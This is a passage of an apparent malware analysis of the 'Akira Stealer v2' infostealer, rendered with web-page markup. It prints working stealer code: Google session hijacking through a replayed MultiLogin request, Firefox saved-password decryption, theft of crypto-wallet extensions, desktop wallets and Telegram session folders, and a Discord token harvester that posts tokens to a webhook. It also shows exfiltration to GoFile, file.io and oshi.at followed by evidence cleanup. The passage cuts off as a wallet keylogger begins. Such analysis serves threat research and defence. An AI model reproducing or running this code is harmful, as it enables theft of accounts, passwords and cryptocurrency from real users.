UTF-8, ignoring any stray errors\n",[1588,13392,13393],{"class":1590,"line":11879},[1588,13394,13395],{}," return plaintext.decode('utf-8', errors='ignore')\n",[810,13397,13399],{"id":13398},"_76-session-token-hijacking","7.6 Session Token Hijacking",[806,13401,1536],{},[806,13403,13404,13405,13408],{},"Akira doesn’t stop at passive data collection—it actively hijacks live session tokens to impersonate victims in real time. After extracting encrypted tokens from browser storage, it reconstructs the required authorization header and replays a ",[1736,13406,13407],{},"MultiLogin"," request against Google’s OAuth endpoint. The code snippet below illustrates this process:",[1545,13410,13412],{"className":10501,"code":13411,"language":10503,"meta":863,"style":863},"# Build SAPISIDHASH header for Google services\norigin = \"https://accounts.google.com\"\ntimestamp = int(time.time())\n# Compute SHA1 of \"timestamp origin SAPISID\"\npayload = f\"{timestamp} {origin} {sap_id_cookie}\".encode()\nsignature = hashlib.sha1(payload).hexdigest()\nheaders = {\n \"Authorization\": f\"SAPISIDHASH {timestamp}_{signature}\",\n \"Content-Type\": \"application/json\"\n}\n# Replay MultiLogin to fetch valid session cookies\nresponse = requests.post(\n \"https://accounts.google.com/accounts/multilogin\",\n headers=headers,\n json={\"continue\": \"https://mail.google.com\"}\n)\nif response.status_code == 200:\n # Victim’s cookies now present in response.cookies\n hijacked_cookies = response.cookies\n",[1524,13413,13414,13419,13424,13429,13434,13439,13444,13449,13454,13459,13463,13468,13473,13478,13483,13488,13492,13497,13502],{"__ignoreMap":863},[1588,13415,13416],{"class":1590,"line":1591},[1588,13417,13418],{},"# Build SAPISIDHASH header for Google services\n",[1588,13420,13421],{"class":1590,"line":864},[1588,13422,13423],{},"origin = \"https://accounts.google.com\"\n",[1588,13425,13426],{"class":1590,"line":1814},[1588,13427,13428],{},"timestamp = int(time.time())\n",[1588,13430,13431],{"class":1590,"line":1831},[1588,13432,13433],{},"# Compute SHA1 of \"timestamp origin SAPISID\"\n",[1588,13435,13436],{"class":1590,"line":2135},[1588,13437,13438],{},"payload = f\"{timestamp} {origin} {sap_id_cookie}\".encode()\n",[1588,13440,13441],{"class":1590,"line":2141},[1588,13442,13443],{},"signature = hashlib.sha1(payload).hexdigest()\n",[1588,13445,13446],{"class":1590,"line":2147},[1588,13447,13448],{},"headers = {\n",[1588,13450,13451],{"class":1590,"line":2153},[1588,13452,13453],{}," \"Authorization\": f\"SAPISIDHASH {timestamp}_{signature}\",\n",[1588,13455,13456],{"class":1590,"line":2159},[1588,13457,13458],{}," \"Content-Type\": \"application/json\"\n",[1588,13460,13461],{"class":1590,"line":2165},[1588,13462,8430],{},[1588,13464,13465],{"class":1590,"line":11039},[1588,13466,13467],{},"# Replay MultiLogin to fetch valid session cookies\n",[1588,13469,13470],{"class":1590,"line":11045},[1588,13471,13472],{},"response = requests.post(\n",[1588,13474,13475],{"class":1590,"line":11051},[1588,13476,13477],{}," \"https://accounts.google.com/accounts/multilogin\",\n",[1588,13479,13480],{"class":1590,"line":11057},[1588,13481,13482],{}," headers=headers,\n",[1588,13484,13485],{"class":1590,"line":11063},[1588,13486,13487],{}," json={\"continue\": \"https://mail.google.com\"}\n",[1588,13489,13490],{"class":1590,"line":11069},[1588,13491,11258],{},[1588,13493,13494],{"class":1590,"line":11075},[1588,13495,13496],{},"if response.status_code == 200:\n",[1588,13498,13499],{"class":1590,"line":11081},[1588,13500,13501],{}," # Victim’s cookies now present in response.cookies\n",[1588,13503,13504],{"class":1590,"line":11087},[1588,13505,13506],{}," hijacked_cookies = response.cookies\n",[806,13508,13509],{},"By replaying this request, Akira can impersonate the user’s Gmail, Drive, or any other Google service protected by a valid session—no credentials required. This technique leverages Google’s own token acceptance logic, making it nearly indistinguishable from legitimate client behavior.",[810,13511,13513],{"id":13512},"_77-firefox-decryption","7.7 Firefox Decryption",[806,13515,1536],{},[806,13517,13518,13519,13522],{},"Gecko‑based browsers like Firefox encrypt saved credentials and cookies using a master key stored in ",[1524,13520,13521],{},"key4.db",". Akira includes a stripped‑down decryption routine mirroring Mozilla’s NSS logic, handling both 3DES and AES‑CBC variants without triggering the master password prompt. Example usage:",[1545,13524,13526],{"className":10501,"code":13525,"language":10503,"meta":863,"style":863},"# Load global Salt and encrypted item from key4.db\ndb = sqlite3.connect(profile_path + \"/key4.db\")\ncursor = db.cursor()\ncursor.execute(\"SELECT item1, item2 FROM metadata WHERE id = 'password'\")\nglobal_salt, item2 = cursor.fetchone()\n\n# Decode DER structure and derive key\ndecoded, _ = der_decode(item2)\nentry_salt = decoded[0][1][0].asOctets()\ncipher_text = decoded[1].asOctets()\n# Derive 3DES key\nkey = derive_3des_key(global_salt, master_password, entry_salt)\niv = decoded[0][1][1].asOctets()\n# Decrypt credentials\ncipher = DES3.new(key, DES3.MODE_CBC, iv)\nclear_password = unpad(cipher.decrypt(cipher_text))\n\nprint(\"Decrypted Firefox password:\", clear_password)\n",[1524,13527,13528,13533,13538,13543,13548,13553,13557,13562,13567,13572,13577,13582,13587,13592,13597,13602,13607,13611],{"__ignoreMap":863},[1588,13529,13530],{"class":1590,"line":1591},[1588,13531,13532],{},"# Load global Salt and encrypted item from key4.db\n",[1588,13534,13535],{"class":1590,"line":864},[1588,13536,13537],{},"db = sqlite3.connect(profile_path + \"/key4.db\")\n",[1588,13539,13540],{"class":1590,"line":1814},[1588,13541,13542],{},"cursor = db.cursor()\n",[1588,13544,13545],{"class":1590,"line":1831},[1588,13546,13547],{},"cursor.execute(\"SELECT item1, item2 FROM metadata WHERE id = 'password'\")\n",[1588,13549,13550],{"class":1590,"line":2135},[1588,13551,13552],{},"global_salt, item2 = cursor.fetchone()\n",[1588,13554,13555],{"class":1590,"line":2141},[1588,13556,9865],{"emptyLinePlaceholder":508},[1588,13558,13559],{"class":1590,"line":2147},[1588,13560,13561],{},"# Decode DER structure and derive key\n",[1588,13563,13564],{"class":1590,"line":2153},[1588,13565,13566],{},"decoded, _ = der_decode(item2)\n",[1588,13568,13569],{"class":1590,"line":2159},[1588,13570,13571],{},"entry_salt = decoded[0][1][0].asOctets()\n",[1588,13573,13574],{"class":1590,"line":2165},[1588,13575,13576],{},"cipher_text = decoded[1].asOctets()\n",[1588,13578,13579],{"class":1590,"line":11039},[1588,13580,13581],{},"# Derive 3DES key\n",[1588,13583,13584],{"class":1590,"line":11045},[1588,13585,13586],{},"key = derive_3des_key(global_salt, master_password, entry_salt)\n",[1588,13588,13589],{"class":1590,"line":11051},[1588,13590,13591],{},"iv = decoded[0][1][1].asOctets()\n",[1588,13593,13594],{"class":1590,"line":11057},[1588,13595,13596],{},"# Decrypt credentials\n",[1588,13598,13599],{"class":1590,"line":11063},[1588,13600,13601],{},"cipher = DES3.new(key, DES3.MODE_CBC, iv)\n",[1588,13603,13604],{"class":1590,"line":11069},[1588,13605,13606],{},"clear_password = unpad(cipher.decrypt(cipher_text))\n",[1588,13608,13609],{"class":1590,"line":11075},[1588,13610,9865],{"emptyLinePlaceholder":508},[1588,13612,13613],{"class":1590,"line":11081},[1588,13614,13615],{},"print(\"Decrypted Firefox password:\", clear_password)\n",[806,13617,13618,13619,2289,13621,8210,13623,13625],{},"With this routine, Akira can transparently dump ",[1524,13620,13017],{},[1524,13622,13020],{},[1524,13624,13023],{}," for each Firefox profile, writing the decrypted output to:",[1545,13627,13630],{"className":13628,"code":13629,"language":916},[1548],"Passwords/Firefox_\u003CProfileName> Passwords.txt\nCookies/Firefox_\u003CProfileName> Cookies.txt\nHistory/Firefox_\u003CProfileName> History.txt\n",[1524,13631,13629],{"__ignoreMap":863},[806,13633,13634],{},"This approach sidesteps user-level master password checks, giving the stealer unfettered access to all stored credentials.*",[806,13636,13637],{},[1736,13638,13639],{},"4. File Structure & Naming",[1545,13641,13644],{"className":13642,"code":13643,"language":916,"meta":863},[1548],"\u003CComputerName>.zip\n└── \u003CComputerName>\\\n ├── Passwords\\\n │ ├── Chrome Passwords.txt\n │ ├── Edge Passwords.txt\n │ └── …\n ├── Cookies\\\n │ ├── Chrome Cookies.txt\n │ ├── Edge Cookies.txt\n │ ├── user@example.com Google Session.txt\n │ └── …\n ├── CreditCards\\\n │ ├── Chrome CreditCards.txt\n │ └── …\n ├── History\\\n │ ├── Chrome History.txt\n │ └── …\n ├── Autofill\\\n │ ├── Chrome Autofill.txt\n │ └── …\n └── Wallets\\\n ├── Firefox_Default_profiles.zip\n ├── Firefox_Profile1_profiles.zip\n └── …\n",[1524,13645,13643],{"__ignoreMap":863},[2738,13647,13648,13662,13668],{},[2741,13649,13650,13651,13654,13655,13658,13659,8072],{},"Each ",[1524,13652,13653],{},".txt"," begins with a consistent header (",[1524,13656,13657],{},"\u003C================[Akira Stealer v2]>================>",") and separator line (",[1524,13660,13661],{},"====…====",[2741,13663,13664,13665,2786],{},"On‑disk ZIP: ",[1524,13666,13667],{},"%TEMP%\\\u003CComputerName>.zip",[2741,13669,13670,13671,2786],{},"C&C filename label: ",[1524,13672,13673],{},"Akira-\u003Cusername>.zip",[806,13675,13676],{},[1736,13677,13678],{},"5. Exfiltration & Cleanup",[1545,13680,13682],{"className":10501,"code":13681,"language":10503,"meta":863,"style":863},"url = Webhook.uploadToGofile(zip_path)\nif not url:\n url = Webhook.uploadFileio(zip_path) or Webhook.uploadToOshiAt(zip_path)\nWebhook.sendDataTG(zip_path, chatId, startup)\nUtils.clear_client_folder()\n",[1524,13683,13684,13689,13694,13699,13704],{"__ignoreMap":863},[1588,13685,13686],{"class":1590,"line":1591},[1588,13687,13688],{},"url = Webhook.uploadToGofile(zip_path)\n",[1588,13690,13691],{"class":1590,"line":864},[1588,13692,13693],{},"if not url:\n",[1588,13695,13696],{"class":1590,"line":1814},[1588,13697,13698],{}," url = Webhook.uploadFileio(zip_path) or Webhook.uploadToOshiAt(zip_path)\n",[1588,13700,13701],{"class":1590,"line":1831},[1588,13702,13703],{},"Webhook.sendDataTG(zip_path, chatId, startup)\n",[1588,13705,13706],{"class":1590,"line":2135},[1588,13707,13708],{},"Utils.clear_client_folder()\n",[2738,13710,13711,13721,13735,13752],{},[2741,13712,13713,13716,13717,13720],{},[1736,13714,13715],{},"Primary Channel (GoFile.io):"," The malware first attempts to upload the ZIP archive containing all stolen artifacts to GoFile.io, parsing the JSON response for a ",[1524,13718,13719],{},"downloadPage"," URL that grants the attacker direct access to the archive.",[2741,13722,13723,13726,13727,13730,13731,13734],{},[1736,13724,13725],{},"Automatic Fallbacks:"," Should the GoFile endpoint fail (network timeout, rate limit, etc.), the code seamlessly falls back to ",[1524,13728,13729],{},"file.io",", and if that too returns an empty link, finally to ",[1524,13732,13733],{},"oshi.at",". Both alternatives are invoked without raising exceptions, ensuring that one of the three services will always be tried in succession.",[2741,13736,13737,13740,13741,13744,13745,2289,13748,13751],{},[1736,13738,13739],{},"Webhook Reporting:"," Once a URL (or an empty string on persistent failure) is determined, ",[1524,13742,13743],{},"Webhook.sendDataTG(...)"," is called, packaging together the download link, machine identifiers (",[1524,13746,13747],{},"chatId",[1524,13749,13750],{},"startup"," flag) and all category counts (passwords, cookies, autofills, wallets) into a single Discord or Telegram message.",[2741,13753,13754,13757,13758,13761],{},[1736,13755,13756],{},"Immediate Cleanup:"," After reporting, ",[1524,13759,13760],{},"Utils.clear_client_folder()"," recursively deletes the entire temporary workspace and the ZIP file itself, leaving no trace of the harvested data or the archive on disk.",[3587,13763,13764,13769],{},[806,13765,13766],{},[1736,13767,13768],{},"Failure Resilience:",[2738,13770,13771,13778],{},[2741,13772,13773,13774,13777],{},"All upload routines return ",[1524,13775,13776],{},"\"\""," on failure instead of throwing, guaranteeing the code flow continues.",[2741,13779,13780],{},"Even if every service is unreachable, the malware still transmits a webhook report (albeit with a missing link) before erasing local artifacts, minimizing forensic remnants unless the process crashes unexpectedly.",[1541,13782],{"className":13783},[6875,6876],[806,13785,13786],{},[1736,13787,13788],{},"6. Robustness & Error Handling",[2738,13790,13791,13809,13815,13824],{},[2741,13792,13793,13796,13797,13800,13801,13804,13805,13808],{},[1736,13794,13795],{},"Granular Exception Handling:"," Every file system interaction—be it ",[1524,13798,13799],{},"shutil.copy",", SQLite queries, or ZIP operations—is wrapped in ",[1524,13802,13803],{},"try/except"," blocks. When an error occurs (locked DB, permission denied, malformed record), the exception is caught and logged via ",[1524,13806,13807],{},"Akira.logErrorTg()",", and execution continues, isolating the failure to that specific file or module.",[2741,13810,13811,13814],{},[1736,13812,13813],{},"Threaded Isolation per Browser:"," The extraction routines for each supported browser run in their own thread. This multi-threaded design ensures that a crash or deadlock in one browser’s extraction (e.g., corrupt profile, missing key) does not halt or delay the analysis of other browsers.",[2741,13816,13817,13820,13821,13823],{},[1736,13818,13819],{},"Silent Fallbacks & Defaults:"," Many auxiliary routines, such as uploading to alternate file hosts, checking remote resources, or spawning subprocesses, employ nested ",[1524,13822,13803],{}," without surface-level alerts—maximizing stealth. Default values (empty strings, booleans) are chosen to keep the flow uninterrupted and remove obvious error conditions.",[2741,13825,13826,13829,13830,13833,13834,13837],{},[1736,13827,13828],{},"Mutex & Startup Guards:"," A named mutex (",[1524,13831,13832],{},"1qsMlseJplTlArIF14f",") prevents multiple instances, while registry checks and ",[1524,13835,13836],{},"Utils.CreateMutex()"," protect against concurrent runs, providing additional stability during real-world deployment.",[810,13839,13841],{"id":13840},"_78-wallet-and-token-exfiltration","7.8 Wallet and Token Exfiltration",[806,13843,1536],{},[806,13845,13846],{},"In this phase, Akira Stealer v2 performs the most comprehensive sweep for cryptocurrency credentials and session tokens, spanning browser extensions, desktop wallets, messaging tokens, and live keylogging. It executes in parallel threads, ensuring no vector is missed. Below is a step-by-step, code-backed deep dive.",[1671,13848,13850],{"id":13849},"_781-browser-extension-wallets","7.8.1 Browser Extension Wallets",[806,13852,1677],{},[806,13854,13855,13858],{},[1736,13856,13857],{},"Targets:"," Over 80 extensions across popular browsers, including MetaMask, Phantom, Trust Wallet, Coinbase Wallet, Solflare, Exodus, Binance Chain Wallet, Keplr, Nami, TronLink, Rabby, Talisman, and more.",[1545,13860,13862],{"className":10501,"code":13861,"language":10503,"meta":863,"style":863},"# Hardcoded list of extension IDs and human-friendly names\nwalletsExtensions = [\n [\"MetaMask\", \"nkbihfbeogaeaoehlefnkodbefgpgknn\"],\n [\"Phantom\", \"bfnaelmomeimhlpmgjnjophhpkkoljpa\"],\n [\"TrustWallet\", \"egjidjbpglichdcondbcbdnbeeppgdph\"],\n [\"CoinbaseWallet\", \"hfhmhopkfngkjcalldmaepmpilmjjemb\"],\n [\"Solflare\", \"bhhhlbepdkbapadjdnnojkbgioiodbic\"],\n [\"BinanceChain\", \"fhbohimaelbohpjbbldcngcnapndodjp\"],\n [\"Keplr\", \"dmkamcknogkgcdfhhbddcghachkejeap\"],\n [\"Nami\", \"lpfcbjknijpeeillifnkikgncikgfhdo\"],\n [\"Talisman\", \"fijngjgcjhjmmpcmkeiomlglpeiijkld\"],\n [\"TronLink\", \"ibnejdfjmmkpcnlpebklmnkoeoihofec\"],\n # ... plus dozens more mapped in code\n]\n# Extraction loop for each browser profile\nfor browser_name, (user_data, proc_name) in paths.items():\n base = os.path.join(user_data, \"Default\", \"Local Extension Settings\")\n for ext_name, ext_id in walletsExtensions:\n src = os.path.join(base, ext_id)\n if os.path.isdir(src):\n dest = os.path.join(Utils.get_temp_folder(), \"Wallets\", f\"{ext_name}_{browser_name}\")\n shutil.copytree(src, dest, dirs_exist_ok=True)\n data.ext_wallets_count += 1\n",[1524,13863,13864,13869,13874,13879,13884,13889,13894,13899,13904,13909,13914,13919,13924,13929,13934,13939,13944,13949,13954,13959,13964,13969,13974],{"__ignoreMap":863},[1588,13865,13866],{"class":1590,"line":1591},[1588,13867,13868],{},"# Hardcoded list of extension IDs and human-friendly names\n",[1588,13870,13871],{"class":1590,"line":864},[1588,13872,13873],{},"walletsExtensions = [\n",[1588,13875,13876],{"class":1590,"line":1814},[1588,13877,13878],{}," [\"MetaMask\", \"nkbihfbeogaeaoehlefnkodbefgpgknn\"],\n",[1588,13880,13881],{"class":1590,"line":1831},[1588,13882,13883],{}," [\"Phantom\", \"bfnaelmomeimhlpmgjnjophhpkkoljpa\"],\n",[1588,13885,13886],{"class":1590,"line":2135},[1588,13887,13888],{}," [\"TrustWallet\", \"egjidjbpglichdcondbcbdnbeeppgdph\"],\n",[1588,13890,13891],{"class":1590,"line":2141},[1588,13892,13893],{}," [\"CoinbaseWallet\", \"hfhmhopkfngkjcalldmaepmpilmjjemb\"],\n",[1588,13895,13896],{"class":1590,"line":2147},[1588,13897,13898],{}," [\"Solflare\", \"bhhhlbepdkbapadjdnnojkbgioiodbic\"],\n",[1588,13900,13901],{"class":1590,"line":2153},[1588,13902,13903],{}," [\"BinanceChain\", \"fhbohimaelbohpjbbldcngcnapndodjp\"],\n",[1588,13905,13906],{"class":1590,"line":2159},[1588,13907,13908],{}," [\"Keplr\", \"dmkamcknogkgcdfhhbddcghachkejeap\"],\n",[1588,13910,13911],{"class":1590,"line":2165},[1588,13912,13913],{}," [\"Nami\", \"lpfcbjknijpeeillifnkikgncikgfhdo\"],\n",[1588,13915,13916],{"class":1590,"line":11039},[1588,13917,13918],{}," [\"Talisman\", \"fijngjgcjhjmmpcmkeiomlglpeiijkld\"],\n",[1588,13920,13921],{"class":1590,"line":11045},[1588,13922,13923],{}," [\"TronLink\", \"ibnejdfjmmkpcnlpebklmnkoeoihofec\"],\n",[1588,13925,13926],{"class":1590,"line":11051},[1588,13927,13928],{}," # ... plus dozens more mapped in code\n",[1588,13930,13931],{"class":1590,"line":11057},[1588,13932,13933],{},"]\n",[1588,13935,13936],{"class":1590,"line":11063},[1588,13937,13938],{},"# Extraction loop for each browser profile\n",[1588,13940,13941],{"class":1590,"line":11069},[1588,13942,13943],{},"for browser_name, (user_data, proc_name) in paths.items():\n",[1588,13945,13946],{"class":1590,"line":11075},[1588,13947,13948],{}," base = os.path.join(user_data, \"Default\", \"Local Extension Settings\")\n",[1588,13950,13951],{"class":1590,"line":11081},[1588,13952,13953],{}," for ext_name, ext_id in walletsExtensions:\n",[1588,13955,13956],{"class":1590,"line":11087},[1588,13957,13958],{}," src = os.path.join(base, ext_id)\n",[1588,13960,13961],{"class":1590,"line":11093},[1588,13962,13963],{}," if os.path.isdir(src):\n",[1588,13965,13966],{"class":1590,"line":11099},[1588,13967,13968],{}," dest = os.path.join(Utils.get_temp_folder(), \"Wallets\", f\"{ext_name}_{browser_name}\")\n",[1588,13970,13971],{"class":1590,"line":11105},[1588,13972,13973],{}," shutil.copytree(src, dest, dirs_exist_ok=True)\n",[1588,13975,13976],{"class":1590,"line":11111},[1588,13977,13978],{}," data.ext_wallets_count += 1\n",[2738,13980,13981,13987],{},[2741,13982,13983,13986],{},[1736,13984,13985],{},"Files copied",": Extension-specific IndexedDB, LevelDB, JSON and config files containing encrypted keys, seed phrases, login credentials.",[2741,13988,13989,2545,13992,2289,13995,9904],{},[1736,13990,13991],{},"Outcome folder",[1524,13993,13994],{},"Wallets/MetaMask_Chrome/",[1524,13996,13997],{},"Wallets/Phantom_Edge/",[1671,13999,14001],{"id":14000},"_782-desktop-wallet-applications","7.8.2 Desktop Wallet Applications",[806,14003,1677],{},[806,14005,14006,14008],{},[1736,14007,13857],{}," Major desktop clients such as Electrum, Exodus, Atomic Wallet, Guarda, Rabby, Coinomi, Zcash, Armory, Bytecoin, Jaxx, Coinomi, etc.",[1545,14010,14012],{"className":10501,"code":14011,"language":10503,"meta":863,"style":863},"walletsDesktop = [\n [\"Electrum\", os.path.join(os.getenv('APPDATA'), \"Electrum\", \"wallets\")],\n [\"Exodus\", os.path.join(os.getenv('APPDATA'), \"Exodus\", \"exodus.wallet\")],\n [\"AtomicWallet\", os.path.join(os.getenv('LOCALAPPDATA'), \"atomic\", \"Local Storage\", \"leveldb\")],\n [\"Guarda\", os.path.join(os.getenv('APPDATA'), \"Guarda\", \"Local Storage\", \"leveldb\")],\n [\"Rabby\", os.path.join(os.getenv('APPDATA'), \"rabby-desktop\")],\n [\"Coinomi\", os.path.join(os.getenv('APPDATA'), \"Coinomi\", \"wallets\")],\n]\nfor name, path in walletsDesktop:\n if os.path.isdir(path):\n Utils.TaskKill(name.lower())\n dest = os.path.join(Utils.get_temp_folder(), \"Wallets\", name)\n shutil.copytree(path, dest, dirs_exist_ok=True)\n data.desktop_wallets_count += 1\n",[1524,14013,14014,14019,14024,14029,14034,14039,14044,14049,14053,14058,14063,14068,14073,14078],{"__ignoreMap":863},[1588,14015,14016],{"class":1590,"line":1591},[1588,14017,14018],{},"walletsDesktop = [\n",[1588,14020,14021],{"class":1590,"line":864},[1588,14022,14023],{}," [\"Electrum\", os.path.join(os.getenv('APPDATA'), \"Electrum\", \"wallets\")],\n",[1588,14025,14026],{"class":1590,"line":1814},[1588,14027,14028],{}," [\"Exodus\", os.path.join(os.getenv('APPDATA'), \"Exodus\", \"exodus.wallet\")],\n",[1588,14030,14031],{"class":1590,"line":1831},[1588,14032,14033],{}," [\"AtomicWallet\", os.path.join(os.getenv('LOCALAPPDATA'), \"atomic\", \"Local Storage\", \"leveldb\")],\n",[1588,14035,14036],{"class":1590,"line":2135},[1588,14037,14038],{}," [\"Guarda\", os.path.join(os.getenv('APPDATA'), \"Guarda\", \"Local Storage\", \"leveldb\")],\n",[1588,14040,14041],{"class":1590,"line":2141},[1588,14042,14043],{}," [\"Rabby\", os.path.join(os.getenv('APPDATA'), \"rabby-desktop\")],\n",[1588,14045,14046],{"class":1590,"line":2147},[1588,14047,14048],{}," [\"Coinomi\", os.path.join(os.getenv('APPDATA'), \"Coinomi\", \"wallets\")],\n",[1588,14050,14051],{"class":1590,"line":2153},[1588,14052,13933],{},[1588,14054,14055],{"class":1590,"line":2159},[1588,14056,14057],{},"for name, path in walletsDesktop:\n",[1588,14059,14060],{"class":1590,"line":2165},[1588,14061,14062],{}," if os.path.isdir(path):\n",[1588,14064,14065],{"class":1590,"line":11039},[1588,14066,14067],{}," Utils.TaskKill(name.lower())\n",[1588,14069,14070],{"class":1590,"line":11045},[1588,14071,14072],{}," dest = os.path.join(Utils.get_temp_folder(), \"Wallets\", name)\n",[1588,14074,14075],{"class":1590,"line":11051},[1588,14076,14077],{}," shutil.copytree(path, dest, dirs_exist_ok=True)\n",[1588,14079,14080],{"class":1590,"line":11057},[1588,14081,14082],{}," data.desktop_wallets_count += 1\n",[2738,14084,14085,14098],{},[2741,14086,14087,14090,14091,2289,14094,14097],{},[1736,14088,14089],{},"Data stolen",": Keystore files (",[1524,14092,14093],{},"*.dat",[1524,14095,14096],{},"*.json","), private key exports, wallet configuration and transaction history.",[2741,14099,14100,14103],{},[1736,14101,14102],{},"Benefit",": Offline wallet contents usable by the attacker to authorize transactions.",[1671,14105,14107],{"id":14106},"_783-discord-token-harvest","7.8.3 Discord Token Harvest",[806,14109,1677],{},[806,14111,14112],{},"Discord tokens are authentication artifacts—essentially long-lived bearer tokens—that can grant full access to a user’s account without requiring their credentials or MFA. Akira exploits this by scanning browser and app data folders for tokens stored by various Discord clients, including Discord Stable, Canary, PTB (Public Test Build), and even modified forks like Lightcord.",[806,14114,14115],{},"The technique targets LevelDB files under the application's Local Storage, where authentication tokens often remain in plaintext. Using regular expressions, the malware scans these .log and .ldb files for patterns that match either regular user tokens or MFA-enabled tokens.",[806,14117,14118],{},"To increase reliability and reduce noise, Akira includes a validation step: it sends a test request to Discord’s /users/@me endpoint using each harvested token. Only tokens that successfully authenticate (HTTP 200) are exfiltrated via webhook—typically to a Discord channel under attacker control.",[806,14120,14121],{},"This method allows attackers to hijack Discord accounts in real time, impersonate the victim, scrape DMs and guilds, or deploy further malware through social engineering—all without triggering login alerts.",[1545,14123,14125],{"className":10501,"code":14124,"language":10503,"meta":863,"style":863},"import re, requests\npatterns = [\n r\"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27,100}\", # User tokens\n r\"mfa\\.[\\w-]{84,100}\" # MFA tokens\n]\ndef harvest_discord(base, webhook_url):\n db_dir = os.path.join(base, \"Local Storage\", \"leveldb\")\n for file in os.listdir(db_dir):\n if file.endswith(('.log', '.ldb')):\n for line in open(os.path.join(db_dir, file), errors='ignore'):\n for pat in patterns:\n for token in re.findall(pat, line):\n # Verify token\n h = {\"Authorization\": token}\n r = requests.get(\"https://discordapp.com/api/v9/users/@me\", headers=h)\n if r.status_code == 200:\n uname = r.json()[\"username\"] + \"#\" + r.json()[\"discriminator\"]\n payload = {\"content\": f\"**Discord** {uname}: `{token}`\"}\n requests.post(webhook_url, json=payload)\n",[1524,14126,14127,14132,14137,14142,14147,14151,14156,14161,14166,14171,14176,14181,14186,14191,14196,14201,14206,14211,14216],{"__ignoreMap":863},[1588,14128,14129],{"class":1590,"line":1591},[1588,14130,14131],{},"import re, requests\n",[1588,14133,14134],{"class":1590,"line":864},[1588,14135,14136],{},"patterns = [\n",[1588,14138,14139],{"class":1590,"line":1814},[1588,14140,14141],{}," r\"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27,100}\", # User tokens\n",[1588,14143,14144],{"class":1590,"line":1831},[1588,14145,14146],{}," r\"mfa\\.[\\w-]{84,100}\" # MFA tokens\n",[1588,14148,14149],{"class":1590,"line":2135},[1588,14150,13933],{},[1588,14152,14153],{"class":1590,"line":2141},[1588,14154,14155],{},"def harvest_discord(base, webhook_url):\n",[1588,14157,14158],{"class":1590,"line":2147},[1588,14159,14160],{}," db_dir = os.path.join(base, \"Local Storage\", \"leveldb\")\n",[1588,14162,14163],{"class":1590,"line":2153},[1588,14164,14165],{}," for file in os.listdir(db_dir):\n",[1588,14167,14168],{"class":1590,"line":2159},[1588,14169,14170],{}," if file.endswith(('.log', '.ldb')):\n",[1588,14172,14173],{"class":1590,"line":2165},[1588,14174,14175],{}," for line in open(os.path.join(db_dir, file), errors='ignore'):\n",[1588,14177,14178],{"class":1590,"line":11039},[1588,14179,14180],{}," for pat in patterns:\n",[1588,14182,14183],{"class":1590,"line":11045},[1588,14184,14185],{}," for token in re.findall(pat, line):\n",[1588,14187,14188],{"class":1590,"line":11051},[1588,14189,14190],{}," # Verify token\n",[1588,14192,14193],{"class":1590,"line":11057},[1588,14194,14195],{}," h = {\"Authorization\": token}\n",[1588,14197,14198],{"class":1590,"line":11063},[1588,14199,14200],{}," r = requests.get(\"https://discordapp.com/api/v9/users/@me\", headers=h)\n",[1588,14202,14203],{"class":1590,"line":11069},[1588,14204,14205],{}," if r.status_code == 200:\n",[1588,14207,14208],{"class":1590,"line":11075},[1588,14209,14210],{}," uname = r.json()[\"username\"] + \"#\" + r.json()[\"discriminator\"]\n",[1588,14212,14213],{"class":1590,"line":11081},[1588,14214,14215],{}," payload = {\"content\": f\"**Discord** {uname}: `{token}`\"}\n",[1588,14217,14218],{"class":1590,"line":11087},[1588,14219,14220],{}," requests.post(webhook_url, json=payload)\n",[2738,14222,14223],{},[2741,14224,14225,14228],{},[1736,14226,14227],{},"Validation",": Only posts valid tokens, preventing stale JWTs from being sent.",[1671,14230,14232],{"id":14231},"_784-telegram-session-files","7.8.4 Telegram Session Files",[806,14234,1677],{},[806,14236,14237,14239],{},[1736,14238,13857],{}," Telegram Desktop/TData",[1545,14241,14243],{"className":10501,"code":14242,"language":10503,"meta":863,"style":863},"def steal_telegram(tdata_path, dest_root):\n if os.path.exists(tdata_path):\n Utils.TaskKill(\"telegram.exe\")\n dest = os.path.join(dest_root, \"Wallets\", \"Telegram\")\n shutil.copytree(tdata_path, dest, dirs_exist_ok=True)\n data.has_telegram = True\n",[1524,14244,14245,14250,14255,14260,14265,14270],{"__ignoreMap":863},[1588,14246,14247],{"class":1590,"line":1591},[1588,14248,14249],{},"def steal_telegram(tdata_path, dest_root):\n",[1588,14251,14252],{"class":1590,"line":864},[1588,14253,14254],{}," if os.path.exists(tdata_path):\n",[1588,14256,14257],{"class":1590,"line":1814},[1588,14258,14259],{}," Utils.TaskKill(\"telegram.exe\")\n",[1588,14261,14262],{"class":1590,"line":1831},[1588,14263,14264],{}," dest = os.path.join(dest_root, \"Wallets\", \"Telegram\")\n",[1588,14266,14267],{"class":1590,"line":2135},[1588,14268,14269],{}," shutil.copytree(tdata_path, dest, dirs_exist_ok=True)\n",[1588,14271,14272],{"class":1590,"line":2141},[1588,14273,14274],{}," data.has_telegram = True\n",[2738,14276,14277,14290],{},[2741,14278,14279,2545,14282,14285,14286,14289],{},[1736,14280,14281],{},"Files",[1524,14283,14284],{},"tdata"," folder containing session keys, ",[1524,14287,14288],{},"D877F..."," folder with secret/unsecret files.",[2741,14291,14292,14295],{},[1736,14293,14294],{},"Use",": Load into attacker’s Telegram client for full account access.",[1671,14297,14299],{"id":14298},"_785-live-wallet-keylogging","7.8.5 Live Wallet Keylogging",[806,14301,1677],{},[806,14303,14304],{},"Cryptocurrency wallets are prime targets for modern info-stealers. Akira includes a live keylogger tailored specifically to steal wallet credentials such as seed phrases, private keys, and passwords at the moment of entry. Unlike generic keyloggers, this one activates only when a known wallet window is detected, dramatically reducing noise and increasing efficiency.",[806,14306,14307],{},"The module monitors active window titles and compares them against a hardcoded list of popular wallet apps like MetaMask, Phantom, Atomic Wallet, and others. Once a matching window is in focus, it begins recording keystrokes via system-wide keyboard hooks. When the user presses Enter, the module immediately captures the current clipboard contents—knowing that users often copy secrets during wallet setup or login—and sends both the typed input and clipboard data to the attacker's webhook. This approach is extremely effective because it combines two attack vectors:",[2738,14309,14310,14313],{},[2741,14311,14312],{},"Context-aware keylogging, to capture sensitive wallet inputs only when relevant.",[2741,14314,14315],{},"Clipboard hijacking, to extract copied recovery phrases or destination addresses before they’re pasted.",[806,14317,14318],{},"Together, these methods allow attackers to silently compromise wallets in real time, even without browser access or file exfiltration.",[1545,14320,14322],{"className":10501,"code":14321,"language":10503,"meta":863,"style":863},"import keyboard, pyperclip\n\nclass WalletKeylogger:\n def 